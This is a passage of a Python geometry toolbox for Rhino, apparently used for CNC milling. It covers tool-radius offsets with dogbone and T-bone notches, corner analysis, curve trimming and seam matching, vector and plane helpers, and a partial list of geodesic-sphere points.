f2_plane = rs.PlaneFromPoints(rs.CurveStartPoint(seg_top[i]), rs.CurveEndPoint(seg_top[i]), rs.CurveStartPoint(seg_bot[i]))
f1_plane = rs.MovePlane(f1_plane, rs.CopyObject(f1_plane.Origin, tool_radius * f1_plane.ZAxis))
f2_plane = rs.MovePlane(f2_plane, rs.CopyObject(f2_plane.Origin, tool_radius * f2_plane.ZAxis))
top_poly.append(Toolbox.Planes.three_planes_intersection(f1_plane, f2_plane, top_plane))
bot_poly.append(Toolbox.Planes.three_planes_intersection(f1_plane, f2_plane, bot_plane))
top_poly = rs.AddPolyline(top_poly+[top_poly[0]])
bot_poly = rs.AddPolyline(bot_poly+[bot_poly[0]])
# notch creation
if notch is True:
if tool_radius < 0: con = 1 #convex corner for inside milling
else: con = -1 #concave corners for outside
corner = Toolbox.Curves.corner_analysis(top_poly, con)
angles = corner[2]
ids = corner[3]
tv = rs.PolylineVertices(crv_top) #top vertices
tov = rs.PolylineVertices(top_poly) #top offset vertices
bv = rs.PolylineVertices(crv_bot) #bottom vertices
bov = rs.PolylineVertices(bot_poly) #bottom offset vertices
ntov = [] #new top offset vertices
nbov = [] #new bottom offset vertices
for i in range(len(tov)):
ntov.append(tov[i])
nbov.append(bov[i])
for j in range(len(ids)):
if i == ids[j]+1:
if angles[j]>limit and angles[j]<(180-limit):
#dogbone notch
if tbone is False:
ntov.append(Toolbox.Curves.create_dogbone_notch(tov[i], tv[i], tool_radius, rs.VectorCreate(tv[i], bv[i])))
nbov.append(Toolbox.Curves.create_dogbone_notch(bov[i], bv[i], tool_radius, rs.VectorCreate(tv[i], bv[i])))
else:
if rs.Distance(tv[i],tv[i-1]) < rs.Distance(tv[i],tv[(i+1)%(len(tv)-1)]):
axis = rs.VectorCreate(tv[i],tv[i-1])
else: axis = rs.VectorCreate(tv[i],tv[(i+1)%(len(tv)-1)])
ntov.append(Toolbox.Curves.create_tbone_notch(tov[i], tv[i], axis, rs.VectorCreate(tv[i], bv[i])))
nbov.append(Toolbox.Curves.create_tbone_notch(bov[i], bv[i], axis, rs.VectorCreate(tv[i], bv[i])))
ntov.append(tov[i])
nbov.append(bov[i])
top_poly = rs.AddPolyline(ntov)
bot_poly = rs.AddPolyline(nbov)
return (top_poly, bot_poly)
@staticmethod
def create_dogbone_notch(a, b, r, v):
"""create a noch at a given polyline vertice (a=offset_point, b=polyline_point, r=tool_radius v=tool_inclination)"""
r = abs(r)
c = rs.AddLine(b,rs.CopyObject(b,v))
d = rs.LineClosestPoint(c,a)
e= rs.CopyObject(a, r*rs.VectorUnitize(rs.VectorCreate(d,a)))
pl=rs.PlaneFromNormal(e,rs.VectorCreate(e,a))
f = rs.LinePlaneIntersection([a,b],pl)
dist = rs.Distance(f,b)
dir = rs.VectorUnitize(rs.VectorCreate(b,a))
g = rs.CopyObject(a,dist*dir)
return rs.PointCoordinates(g)
@staticmethod
def create_tbone_notch(a, b, axis, v):
"""create a noch at a given polyline vertice (a=offset_point, b=polyline_point, axis=tbone direction, v=tool_inclination)"""
pl = rs.PlaneFromFrame(b, v, axis)
pl = rs.RotatePlane(pl, 90, pl.XAxis)
c = rs.CopyObject(a, axis)
d = rs.LinePlaneIntersection([a,c],pl)
return d
@staticmethod
def curve_concave_points(curve):
concave_points = []
seg = rs.ExplodeCurves(curve)
vec = []
normal = rs.CurveNormal(curve)
for i in range(len(seg)):
vec.append(rs.VectorCreate(rs.CurveEndPoint(seg[i]), rs.CurveStartPoint(seg[i])))
for i in range(len(vec)):
cross = rs.VectorCrossProduct(vec[i], vec[(i+1) % len(vec)])
dot = rs.VectorDotProduct(cross, normal)
if dot < -0.0000001 :
concave_points.append(rs.CurveEndPoint(seg[i]))
return concave_points
@staticmethod
def curve_convex_points(curve):
convex_points = []
seg = rs.ExplodeCurves(curve)
vec = []
normal = rs.CurveNormal(curve)
for i in range(len(seg)):
vec.append(rs.VectorCreate(rs.CurveEndPoint(seg[i]), rs.CurveStartPoint(seg[i])))
for i in range(len(vec)):
cross = rs.VectorCrossProduct(vec[i], vec[(i+1) % len(vec)])
dot = rs.VectorDotProduct(cross, normal)
if dot > 0.0000001 :
convex_points.append(rs.CurveEndPoint(seg[i]))
return convex_points
@staticmethod
def corner_analysis(curve, mode = 0):
"""mode : -1 = concave, 1 = convex, 0 = both"""
tol = 0.0000001
normal = rs.CurveNormal(curve)
seg = rs.ExplodeCurves(curve)
vec = []
points = []
bisectors = []
angles = []
ids = []
# if product < 0 : then the corner is concave
for i in range(len(seg)):
v = rs.VectorCreate(rs.CurveEndPoint(seg[i]), rs.CurveStartPoint(seg[i]))
vec.append(rs.VectorUnitize(v))
for i in range(len(vec)):
cross = rs.VectorCrossProduct(vec[i], vec[(i+1) % len(vec)])
dot = rs.VectorDotProduct(cross, normal)
# keep concave or convex points or both
flag = False
if mode == -1 :
if (dot < -tol) : flag = True
elif mode == 1 :
if (dot > tol) : flag = True
else:
if (dot < -tol or dot > tol) : flag = True
if flag:
points.append(rs.CurveEndPoint(seg[i]))
bisectors.append(rs.VectorUnitize(rs.VectorAdd(vec[i], - vec[(i+1) % len(vec)])))
angle_1 = rs.VectorAngle(vec[i], -vec[(i+1) % len(vec)])
angle_2 = 360-angle_1
angles.append(min(abs(angle_1), abs(angle_2)))
ids.append(i)
return [points, bisectors, angles, ids]
@staticmethod
def insert_curves(base_curve, curves_to_insert, seam=None, tolerance = 0.1):
base_curve = copy.deepcopy(base_curve)
curves_to_insert = copy.deepcopy(curves_to_insert)
# shatter points
points = []
for i in range(len(curves_to_insert)):
points.append(rs.CurveClosestPoint(base_curve, rs.CurveStartPoint(curves_to_insert[i])))
points.append(rs.CurveClosestPoint(base_curve, rs.CurveEndPoint(curves_to_insert[i])))
sorted(points)
# split curve
base_curve = rs.coercecurve(base_curve)
split = rg.Curve.Split(base_curve, points)
# 2 possible ways of trimming the curve
trim_A = []
trim_B = []
for j in range(len(split)):
# cull pattern (keep only even or odd indices)
if j%2 == 0 : trim_A.append(split[j])
if j%2 == 1 : trim_B.append(split[j])
# join curve
for j in range(len(curves_to_insert)):
curves_to_insert[j] = rs.coercecurve(curves_to_insert[j])
result_A = rg.Curve.JoinCurves(curves_to_insert + trim_A, tolerance)
result_B = rg.Curve.JoinCurves(curves_to_insert + trim_B, tolerance)
# case with multiple curves to insert
if len(curves_to_insert) > 1 :
# best result is the best unified polyline
if len(result_A) < len(result_B) : result = result_A
else: result = result_B
# case with only one curve to insert
else:
# best result is the longest curve
if rg.Curve.GetLength(result_A[0]) > rg.Curve.GetLength(result_B[0]) : result = result_A
else: result = result_B
if len(result) > 1 :
#raise Exception('joining curves failed to output a single polyline')
return curves_to_insert[0]
else :
final_curve = result[0]
final_curve = scriptcontext.doc.Objects.Add(final_curve)
if seam != None:
Toolbox.Curves.curve_seam(final_curve, seam)
final_curve = rs.coercecurve(final_curve)
final_curve = Toolbox.Curves.resimplify_Curve(final_curve)
else: final_curve = rs.coercecurve(final_curve)
return final_curve
@staticmethod
def curve_seam(curve, point):
return rs.CurveSeam(curve, rs.CurveClosestPoint(curve, point))
@staticmethod
def curve_difference(base_curve, trim_curve):
# trim a curve using a surface
base_surface = rs.coercebrep(rs.AddPlanarSrf(base_curve))
base_curve = rs.coercecurve(base_curve)
line = rg.Intersect.Intersection.CurveBrep(trim_curve, base_surface, 0.001)[1][0]
p1 = line.PointAtStart
p2 = line.PointAtEnd
param1 = round(rg.Curve.ClosestPoint(base_curve,p1)[1],6)
param2 = round(rg.Curve.ClosestPoint(base_curve,p2)[1],6)
if param2 < param1 : param1, param2 = param2, param1
trim1 = rg.Curve.Trim(copy.deepcopy(base_curve), param1, param2)
trim2A = rg.Curve.Trim(copy.deepcopy(base_curve), base_curve.Domain[0], param1)
trim2B = rg.Curve.Trim(copy.deepcopy(base_curve), param2, base_curve.Domain[1])
trim2 = rg.Curve.JoinCurves([trim2A,trim2B])[0]
mid = rs.coerce3dpoint(Toolbox.Points.average_point([p1,p2]))
d1 = rg.Curve.PointAt(trim1,rg.Curve.ClosestPoint(trim1,mid)[1])
d2 = rg.Curve.PointAt(trim2,rg.Curve.ClosestPoint(trim2,mid)[1])
dist1 = rs.Distance(d1, mid)
dist2 = rs.Distance(d2, mid)
if dist1 > dist2: result = trim1
else: result = trim2
return result
@staticmethod
def curve_closest_point(curve, point):
return rs.EvaluateCurve(curve, rs.CurveClosestPoint(curve, point))
@staticmethod
def offset(closed_curve, distance):
if distance != 0 :
return rs.OffsetCurve(closed_curve, rs.CurveAreaCentroid(closed_curve)[0], distance)[0]
else : return closed_curve
@staticmethod #WIP
def fill(closed_curve, distance, border=False):
if distance > 0 :
if border is True:
closed_curve = Toolbox.Curves.offset(closed_curve, -distance)
curves = []
for i in range(7) :
try:
curve = Toolbox.Curves.offset(closed_curve, distance*(i+1))
curve = Toolbox.Curves.open_closed_curve(curve)
if i > 0:
if rs.CurveLength(curve) > rs.CurveLength(curves[i-1]): break
link = rs.AddLine(rs.CurveEndPoint(curves[i-1]),rs.CurveStartPoint(curve))
curves.append(rs.JoinCurves([curve, link])[0])
else: curves.append(curve)
except: break
if len(curves) > 1 :
return rs.JoinCurves(curves)[0]
else : return curves[0]
else : return closed_curve
@staticmethod
def open_closed_curve(curve):
tol = 0.000001 / rs.CurveLength(curve)
p = rs.CurveParameter(curve,1-tol)
return rs.AddSubCrv(curve, 0, p)
@staticmethod
def close_open_curve(curve):
if rs.IsCurveClosed(curve) is False:
line = rs.AddLine(rs.CurveStartPoint(curve), rs.CurveEndPoint(curve))
return rg.Curve.JoinCurves([rs.coercecurve(line),rs.coercecurve(curve)])[0]
else: return curve
@staticmethod
def sort_curves_by_length(curves):
curves_tuples = []
for i in range(len(curves)):
curve_length = rs.CurveLength(curves[i])
curves_tuples.append([curves[i],curve_length])
sortedcurves = sorted(curves_tuples, key=lambda curves: curves[1])
return sortedcurves
@staticmethod
def align_curve_direction(guide, curve):
if rs.CurveDirectionsMatch(curve, guide) == False:
try: rg.Curve.Reverse(curve)
except: rs.ReverseCurve(curve)
return curve
@staticmethod
def align_curve_direction_2(guide, curve, n = 10):
'''Flip curve comparing the angular difference between n tangent on both curves'''
x = guide
y = curve
r = rg.Curve.Duplicate(y)
rg.Curve.Reverse(r)
px = rg.Curve.DivideByCount(x,n,True)
py = rg.Curve.DivideByCount(y,n,True)
pr = rg.Curve.DivideByCount(r,n,True)
tot1 = 0
tot2 = 0
for i in range(n):
tx = rg.Curve.TangentAt(x, px[i])
ty = rg.Curve.TangentAt(y, py[i])
tr = rg.Curve.TangentAt(r, pr[i])
tot1 += rg.Vector3d.VectorAngle(tx,ty)
tot2 += rg.Vector3d.VectorAngle(tx,tr)
if tot1 > tot2 :
rg.Curve.Reverse(y)
return y
@staticmethod
def resimplify_Curve(curve):
"""Simplify and change curve seam if it's not already a vertice"""
curve=scriptcontext.doc.Objects.Add(curve)
vertices = rs.PolylineVertices(curve)
best_candidate=curve
best_v_len = len(vertices)
for i in range(len(vertices)):
new_candidate = rs.CopyObject(curve)
rs.CurveSeam(new_candidate, rs.CurveClosestPoint(new_candidate,vertices[i]))
rs.SimplifyCurve(new_candidate)
v_len = len(rs.PolylineVertices(new_candidate))
if v_len < best_v_len:
best_candidate = rs.CopyObject(new_candidate)
best_v_len = v_len
return rs.coercecurve(best_candidate)
@staticmethod
def match_seams(curve1, curve2, simplify=True):
"""match the seam of two curves that have parallel segments"""
if simplify is True:
curve1=Toolbox.Curves.resimplify_Curve(curve1)
curve2=Toolbox.Curves.resimplify_Curve(curve2)
curve2 = Toolbox.Curves.align_curve_direction(rs.coercecurve(curve1),rs.coercecurve(curve2))
curve1=scriptcontext.doc.Objects.Add(curve1)
curve2=scriptcontext.doc.Objects.Add(curve2)
seg1 = rs.ExplodeCurves(curve1)
seg2 = rs.ExplodeCurves(curve2)
seg1 = [seg for seg in seg1 if rs.CurveLength(seg)>0.00001]
seg2 = [seg for seg in seg2 if rs.CurveLength(seg)>0.00001]
curve1 = rs.AddPolyline([rs.CurveStartPoint(seg) for seg in seg1]+[rs.CurveStartPoint(curve1)])
curve2 = rs.AddPolyline([rs.CurveStartPoint(seg) for seg in seg2]+[rs.CurveStartPoint(curve2)])
shift = None
if len(seg1) == len(seg2):
for i in range(len(seg2)):
flag = True
for j in range(len(seg1)):
vec1 = Toolbox.Vectors.line_to_vec(seg2[(i+j)%len(seg2)])
vec2 = Toolbox.Vectors.line_to_vec(seg1[j])
if rs.IsVectorParallelTo(vec1,vec2) != 1:
flag = False
if flag == True:
shift = i
break
else: raise Exception("polylines have a different number of segments")
if shift == None: raise Exception("polyline segments are not parallel")
else:
points = rs.PolylineVertices(curve2)
Toolbox.Curves.curve_seam(curve2, points[shift])
rs.coercecurve(curve2)
curve1 = rs.coercecurve(curve1)
curve2 = rs.coercecurve(curve2)
return [curve1,curve2]
@staticmethod
def match_seams_old(curve1,curve2, simplify=True):
"""Match the seams of two curves"""
if simplify is True:
Toolbox.Curves.resimplify_Curve(curve1)
Toolbox.Curves.resimplify_Curve(curve2)
Toolbox.Curves.align_curve_direction(rs.coercecurve(curve1),rs.coercecurve(curve2))
vcurve2 = rs.PolylineVertices(curve2)
del vcurve2[-1]
vcurve1 = rs.PolylineVertices(curve1)
del vcurve1[-1]
best_score = None
for i in range(len(vcurve2)):
totlen = 0
test = rs.CopyObject(curve2)
rs.CurveSeam(test, rs.CurveClosestPoint(test, vcurve2[i]))
vt = rs.PolylineVertices(test)
del vt[-1]
for j in range(min(len(vt), len(vcurve1))):
totlen += rs.Distance(vt[j],vcurve1[j])
if best_score == None:
curve2 = rs.CopyObject(test)
best_score = totlen
if totlen < best_score:
curve2 = rs.CopyObject(test)
best_score = totlen
return [curve1, curve2]
@staticmethod
def get_spikes(curve, tolerance=0.0001):
spikes = []
vertices = rs.PolylineVertices(curve)
del vertices[0]
for i in range(len(vertices)):
if rs.Distance(vertices[i-1],vertices[(i+1)%len(vertices)]) < tolerance:
spikes.append(rs.AddLine(vertices[i-1],vertices[i]))
return spikes
@staticmethod
def create_polygon(plane, radius, sides=3):
if sides == 2:
a = rs.CopyObject(plane[0], -plane[1] * radius)
b = rs.CopyObject(plane[0], plane[1] * radius)
return rs.AddPolyline([a, b, plane[0]])
elif sides >2:
circle = rg.Circle(plane, radius)
rh_polygon = rg.Polyline.CreateInscribedPolygon(circle,sides)
gh_polygon=[]
for i in range(len(rh_polygon)-1):
gh_polygon.append(rs.AddLine(rh_polygon[i],rh_polygon[i+1]))
return rs.JoinCurves(gh_polygon)[0]
@staticmethod
def trapeze_to_rectangle(trapeze):
"""bases of the trapeze have to be longer than sides"""
sorted_sides = Toolbox.Curves.sort_curves_by_length(rs.ExplodeCurves(trapeze))
longest_side = sorted_sides[-1][0]
second_side = sorted_sides[-2][0]
#exception sides not parallel
if rs.IsVectorParallelTo(Toolbox.Vectors.line_to_vec(longest_side),Toolbox.Vectors.line_to_vec(second_side)) == 0:
raise Exception('Longest sides are not parallel')
#start with the extremities of the second longest side
point1 = rs.CurveStartPoint(second_side)
point2 = rs.CurveEndPoint(second_side)
#create a plane at one extremity
plane1 = rs.PlaneFromNormal(rs.CurveStartPoint(second_side),rs.VectorCreate(point2,point1))
#test if the plane is intersecting the other side
if rs.PlaneCurveIntersection(plane1,longest_side):
pointA = point1
pointB = rs.PlaneCurveIntersection(plane1,longest_side)[0][1]
else:
point3 = rs.CurveEndPoint(longest_side)
point4 = rs.CurveStartPoint(longest_side)
plane3 = rs.PlaneFromNormal(rs.CurveEndPoint(longest_side),rs.VectorCreate(point2,point1))
plane4 = rs.PlaneFromNormal(rs.CurveStartPoint(longest_side),rs.VectorCreate(point2,point1))
pointA = point3
pointB = rs.PlaneCurveIntersection(plane3,second_side)[0][1]
plane2 = rs.PlaneFromNormal(rs.CurveEndPoint(second_side),rs.VectorCreate(point2,point1))
if rs.PlaneCurveIntersection(plane2,longest_side):
pointC = point2
pointD = rs.PlaneCurveIntersection(plane2,longest_side)[0][1]
else:
point3 = rs.CurveStartPoint(longest_side)
point4 = rs.CurveEndPoint(longest_side)
plane3 = rs.PlaneFromNormal(rs.CurveStartPoint(longest_side),rs.VectorCreate(point2,point1))
plane4 = rs.PlaneFromNormal(rs.CurveEndPoint(longest_side),rs.VectorCreate(point2,point1))
pointC = point3
pointD = rs.PlaneCurveIntersection(plane3,second_side)[0][1]
#solve crossing polyline exception
polyline = rs.AddPolyline([pointA,pointB,pointC,pointD, pointA])
polyline_bis = rs.AddPolyline([pointA,pointB,pointD,pointC, pointA])
if rs.CurveLength(polyline_bis) < rs.CurveLength(polyline):
polyline = polyline_bis
return polyline
@staticmethod
def insert_crossing_point(poly1, poly2):
"""intersect two polylines and add intersection points to the first polyline."""
tolerance = 0.000001
params = []
points = rs.PolylineVertices(poly1)
inter = rs.CurveCurveIntersection(poly1, poly2)
#get curve parameter
for i in range(len(points)):
params.append(rs.CurveClosestPoint(poly1, points[i]))
for i in range(len(inter)):
#check that this point is not already in the sequence
flag = True
for j in range(len(points)):
if rs.Distance(points[j], inter[i][1]) < tolerance:
flag = False
#find curve parameter
if flag is True:
params.append(rs.CurveClosestPoint(poly1, inter[i][1]))
#sort parameters
params = sorted(params)
points = []
for i in range(len(params)):
points.append(rs.EvaluateCurve(poly1, params[i]))
return rs.AddPolyline(points)
@staticmethod
def polyline_half_zones(poly):
"""
Divide a polyline in two using the axis linking endpoints.
Each pieces is closed to shape a new polyline.
The new polylines are split in two list depending on their position to the axis.
"""
# Axis creation
line = rs.AddLine(rs.CurveEndPoint(poly), rs.CurveStartPoint(poly))
# Add vertices at the intersection between the axis and the polyline
poly = Toolbox.Curves.insert_crossing_point(poly, line)
# Data
base_vec = rs.VectorCreate(rs.CurveEndPoint(poly), rs.CurveStartPoint(poly))
points = rs.PolylineVertices(poly)
normal = rs.CurveNormal(poly)
if normal[2] < 0 : normal = rs.VectorReverse(normal)
positive = []
negative = []
positive_points = []
negative_points = []
tempo = []
tempo.append(rs.CurveStartPoint(poly))
flag = 'Null'
for i in range(len(points)-1):
# Use cross product to determine the position of the point in relation to the axis
test_vec = rs.VectorCreate(points[i+1], rs.CurveStartPoint(poly))
angle = rs.VectorAngle(base_vec, test_vec)
if angle > 0.01:
cross = rs.VectorUnitize(rs.VectorCrossProduct(base_vec, test_vec))
else: cross = None
# When the point is on the axis, close the polyline and initialize a new one
if cross == None:
tempo.append(points[i+1])
tempo.append(tempo[0])
if flag == 'Pos': positive_points.append(tempo)
if flag == 'Neg': negative_points.append(tempo)
tempo = []
flag = 'Null'
# Change the flag value depending of the crossproduct result
elif rs.IsVectorParallelTo(cross, normal) == 1 :
flag = 'Pos'
elif rs.IsVectorParallelTo(cross, normal) == -1 :
flag = 'Neg'
else: raise Exception('Cross Product in Polyline half-zone got an unexpected result')
# Add this point to the temporary list
tempo.append(points[i+1])
# Create polylines
if positive_points != []:
for i in range(len(positive_points)):
positive.append(rs.AddPolyline(positive_points[i]))
if negative_points != []:
for i in range(len(negative_points)):
negative.append(rs.AddPolyline(negative_points[i]))
return positive, negative
@staticmethod
def fillet_curves(c1, c2, radius, join=True):
c1 = rs.coercecurve(c1)
c2= rs.coercecurve(c2)
d1 = rs.Distance(rs.CurveStartPoint(c1), rs.CurveStartPoint(c2))
d2 = rs.Distance(rs.CurveEndPoint(c1), rs.CurveStartPoint(c2))
d3 = rs.Distance(rs.CurveEndPoint(c1), rs.CurveEndPoint(c2))
d4 = rs.Distance(rs.CurveStartPoint(c1), rs.CurveEndPoint(c2))
p1, p2 = rs.CurveStartPoint(c1), rs.CurveStartPoint(c2)
if d2 < d1: p1, p2 = rs.CurveEndPoint(c1), rs.CurveStartPoint(c2)
if d3 < d2 and d3 < d1: p1, p2 = rs.CurveEndPoint(c1), rs.CurveEndPoint(c2)
if d4 < d3 and d4 < d2 and d4 < d1: p1, p2 = rs.CurveStartPoint(c1), rs.CurveEndPoint(c2)
return rg.Curve.CreateFilletCurves(c1, p1, c2, p2, radius, join,join, join, 0.001,0.001)[0]
@staticmethod
def connect_curves(c1,c2):
d1 = rs.Distance(rs.CurveStartPoint(c1), rs.CurveStartPoint(c2))
d2 = rs.Distance(rs.CurveStartPoint(c1), rs.CurveEndPoint(c2))
if d1 < d2:
l1 = rs.AddLine(rs.CurveStartPoint(c1), rs.CurveStartPoint(c2))
l2 = rs.AddLine(rs.CurveEndPoint(c1), rs.CurveEndPoint(c2))
else:
l1 = rs.AddLine(rs.CurveStartPoint(c1), rs.CurveEndPoint(c2))
l2 = rs.AddLine(rs.CurveEndPoint(c1), rs.CurveStartPoint(c2))
return rs.JoinCurves([c1,l1,c2,l2])[0]
@staticmethod
def trim_curve_with_curve(curve,cutter):
param = rg.Intersect.Intersection.CurveCurve(curve,cutter,0.001,0.001).Item[0].ParameterA
return rg.Curve.Split(curve,param)[0]
@staticmethod
def isSharingEdge(curve1, curve2):
flag = False
segmentsX = rs.ExplodeCurves(curve1)
segmentsY = rs.ExplodeCurves(curve2)
for segX in segmentsX:
for segY in segmentsY:
#line are parallel
isParallel = rs.IsVectorParallelTo(Toolbox.Vectors.line_to_vec(segX),Toolbox.Vectors.line_to_vec(segY))!= 0
isColinear = rs.Distance(rs.LineClosestPoint(segX, rs.CurveStartPoint(segY)),rs.CurveStartPoint(segY)) < 0.001
if isParallel and isColinear:
if isParallel == -1: segY=rs.ReverseCurve(segY)
d1 = rs.Distance(rs.CurveStartPoint(segX), rs.CurveStartPoint(segY))
d2 = rs.Distance(rs.CurveEndPoint(segX), rs.CurveEndPoint(segY))
d3 = rs.Distance(rs.CurveStartPoint(segX), rs.CurveEndPoint(segY))
d4 = rs.Distance(rs.CurveEndPoint(segX), rs.CurveStartPoint(segY))
l1 = rs.CurveLength(segY)
l2 = rs.CurveLength(segX)
if ((d1 <= l1) and (d3 <= l1)) or ((d2 <= l1) and (d4 <= l1)): flag = True
if ((d1 <= l2) and (d4<= l2)) or ((d2 <= l2) and (d3 <= l2)): flag = True
return flag
@staticmethod
def bezier(points, t):
"""construct a bezier curve for a set of points. The curve is defined with t going from 0 to 1"""
lines = []
while len(points)>1:
new_points = []
for i in range(len(points)-1):
l = rs.AddLine(points[i], points[i+1])
lines.append(l)
d = rs.CurveDomain(l)[1]
new_points.append(rs.EvaluateCurve(l,t*d))
points = new_points
return points[0]
class Planes:
@staticmethod
def is_plane_in_plane(plane1, plane2):
"""check if planes are parallel and in each other planes"""
flag = False
# normal should be parallel
if abs(rs.IsVectorParallelTo(plane1.ZAxis, plane2.ZAxis)) == 1:
# trivial case where origins are the same
if rs.Distance(plane1.Origin, plane2.Origin) < 0.00001 : flag = True
# check if the translation from frame to frame is in the plane
else:
vec = rs.VectorUnitize(rs.VectorCreate(plane2.Origin, plane1.Origin))
test = rs.VectorCrossProduct(vec, plane1.XAxis)
if abs(rs.IsVectorParallelTo(test, plane1.ZAxis)) == 1 or str(Toolbox.Vectors.round_vector(test,6)) == '0,0,0' : flag = True
return flag
@staticmethod
def orient(object, ref, target):
transform = rg.Transform.PlaneToPlane(ref, target)
return scriptcontext.doc.Objects.Transform(object, transform, False)
@staticmethod
def three_planes_intersection(p1,p2,p3):
"""intersect three planes to get a point. Planes should not be parallel!"""
l=rs.PlanePlaneIntersection(p1,p2)
return rs.LinePlaneIntersection(l,p3)
class Vectors:
@staticmethod
def average_vector(vectors, cull_dup=False):
"""average a list of vectors"""
if cull_dup == True:
vectors = Toolbox.Vectors.cull_dup(vectors)
l = len(vectors)
x = 0
y = 0
z = 0
for i in range(l):
x += vectors[i][0]
y += vectors[i][1]
z += vectors[i][2]
x = x/l
y = y/l
z = z/l
return rs.VectorCreate((x,y,z),(0,0,0))
@staticmethod
def cull_dup(vectors):
"""cull duplicate vectors in a list"""
unique_vec = []
for i in range(len(vectors)):
add = True
for j in range(i):
v1 = Toolbox.Vectors.round_vector(vectors[i], n=6)
v2 = Toolbox.Vectors.round_vector(vectors[j], n=6)
if v1 == v2: add=False
if add == True: unique_vec.append(vectors[i])
return unique_vec
@staticmethod
def project_vector_to_plane(vector,plane):
"""project a vector to a plane by projecting a line on a disk"""
center = plane.Origin
line = rs.AddLine(center,rs.CopyObject(center,vector))
disk = rs.AddPlanarSrf(rs.AddCircle(plane,2*rs.VectorLength(vector)))
direction = -rs.SurfaceNormal(disk,[0,0])
rounded_vec = Toolbox.Vectors.round_vector(vector,6)
rounded_dir = Toolbox.Vectors.round_vector(direction,6)
if rounded_vec != rounded_dir and rounded_vec != -rounded_dir:
projection = rs.ProjectCurveToSurface(line,disk,direction)
new_vector=rs.VectorUnitize(rs.VectorCreate(rs.CurveEndPoint(projection),rs.CurveStartPoint(projection)))
return new_vector
else: return vector
@staticmethod
def line_to_vec(line, unitize=False):
"""get a vector from a line"""
vec = rs.VectorCreate(rs.CurveEndPoint(line),rs.CurveStartPoint(line))
if unitize is True:
vec = rs.VectorUnitize(vec)
return vec
@staticmethod
def is_vector_outward(center, vector_location, vector):
""" check if a vector points toward a center point or outward """
testpoint = rs.CopyObject(vector_location,rs.VectorUnitize(vector)*0.01)
if rs.Distance(center,testpoint) < rs.Distance(center,vector_location):
return False
if rs.Distance(center,testpoint) > rs.Distance(center,vector_location):
return True
else: raise Exception("is_vector_outward cannot compute because vector is tangent to circle")
@staticmethod
def round_vector(vector, n=6):
"""round x,y,z components of a vector to n decimals"""
vec = copy.deepcopy(vector)
for i in range(len(vec)):
vec[i] = round(vec[i],n)
return vec
@staticmethod
def cross(a, b):
"""simple cross product between two vectors"""
c = [a[1]*b[2] - a[2]*b[1],
a[2]*b[0] - a[0]*b[2],
a[0]*b[1] - a[1]*b[0]]
return c
@staticmethod
def isvectornull(vector):
"""check if a vector is null or close to (0,0,0)"""
state = True
for i in range(len(vector)):
if Toolbox.Numbers.isclose(vector[i],0, rel_tol=1e-06, abs_tol=1e-06) is False:
state = False
return state
class Points:
@staticmethod
def point_closest_point(point, points):
shortest_distance = None
candidate = None
for p in points:
if shortest_distance is None or rs.Distance(point, p) < shortest_distance:
shortest_distance = rs.Distance(point, p)
candidate = p
return candidate
@staticmethod
def average_point(points):
"""average a list of points"""
l = len(points)
x = 0
y = 0
z = 0
for i in range(l):
x += points[i][0]
y += points[i][1]
z += points[i][2]
x = x/l
y = y/l
z = z/l
return rs.AddPoint(x,y,z)
@staticmethod
def project_point_to_plane(point, plane, direction):
"""project a point to a plane"""
line = [rs.CopyObject(point, direction), point]
intersect = rs.LinePlaneIntersection(line, plane)
return intersect
@staticmethod
def geodesic_sphere_points():
points = [[-0.850650787354,-0.525731086731,0.0],
[0.850650787354,-0.525731086731,0.0],
[-0.850650787354,0.525731086731,0.0],
[0.850650787354,0.525731086731,0.0],
[0.0,-0.850650787354,-0.525731086731],
[0.0,0.850650787354,-0.525731086731],
[0.0,-0.850650787354,0.525731086731],
[0.0,0.850650787354,0.525731086731],
[-0.525731086731,0.0,-0.850650787354],
[-0.525731086731,0.0,0.850650787354],
[0.525731086731,0.0,-0.850650787354],
[0.525731086731,0.0,0.850650787354],
[-0.5,-0.809017002583,0.309017002583],
[0.0,-1.0,0.0],
[-0.5,-0.809017002583,-0.309017002583],
[-0.309017002583,-0.5,0.809017002583],
[-0.5,-0.809017002583,0.309017002583],
[-0.809017002583,-0.309017002583,0.5],
[-0.309017002583,-0.5,0.809017002583],
[0.0,0.0,1.0],
[0.309017002583,-0.5,0.809017002583],
[0.309017002583,-0.5,0.809017002583],
[0.809017002583,-0.309017002583,0.5],
[0.5,-0.809017002583,0.309017002583],
[0.5,-0.809017002583,-0.309017002583],
[0.0,-1.0,0.0],
[0.5,-0.809017002583,0.309017002583],
[-0.5,-0.809017002583,-0.309017002583],
[-0.309017002583,-0.5,-0.809017002583],
[-0.809017002583,-0.309017002583,-0.5],
[0.5,-0.809017002583,-0.309017002583],
[0.809017002583,-0.309017002583,-0.5],
[0.309017002583,-0.5,-0.809017002583],
[0.0,0.0,-1.0],
[-0.309017002583,-0.5,-0.809017002583],
[0.309017002583,-0.5,-0.809017002583],
[-1.0,0.0,0.0],
[-0.809017002583,0.309017002583,-0.5],
[-0.809017002583,-0.309017002583,-0.5],
[-0.5,0.809017002583,-0.309017002583],
[-0.309017002583,0.5,-0.809017002583],
[-0.809017002583,0.309017002583,-0.5],
[0.0,0.0,-1.0],
[-0.309017002583,0.5,-0.809017002583],
[0.309017002583,0.5,-0.809017002583],
[0.309017002583,0.5,-0.809017002583],
[0.5,0.809017002583,-0.309017002583],
[0.809017002583,0.309017002583,-0.5],
[0.5,0.809017002583,-0.309017002583],
[0.0,1.0,0.0],
[0.5,0.809017002583,0.309017002583],
[0.5,0.809017002583,0.309017002583],
[0.309017002583,0.5,0.809017002583],
[0.809017002583,0.309017002583,0.5],
[1.0,0.0,0.0],
[0.809017002583,0.309017002583,0.5],
[0.809017002583,-0.309017002583,0.5],
[-0.809017002583,0.309017002583,0.5],
[-1.0,0.0,0.0],
[-0.809017002583,-0.309017002583,0.5],
[-0.309017002583,0.5,0.809017002583],
[-0.5,0.809017002583,0.309017002583],
[-0.809017002583,0.309017002583,0.5],
[-0.309017002583,0.5,0.809017002583],
[0.0,0.0,1.0],
[0.309017002583,0.5,0.809017002583],
[-0.5,0.809017002583,-0.309017002583],
[-0.5,0.809017002583,0.309017002583],
[0.0,1.0,0.0],
[0.809017002583,0.309017002583,-0.5],
[1.0,0.0,0.0],
[0.809017002583,-0.309017002583,-0.5],
[-0.71656692028,-0.681718349457,0.147620901465],
[-0.525731086731,-0.850650787354,0.0],
[-0.71656692028,-0.681718349457,-0.147620901465],
[-0.238855645061,-0.864187836647,0.442862719297],
[0.0,-0.955422580242,0.295241802931],
[-0.262865543365,-0.951056540012,0.162459850311],
[-0.262865543365,-0.951056540012,-0.162459850311],
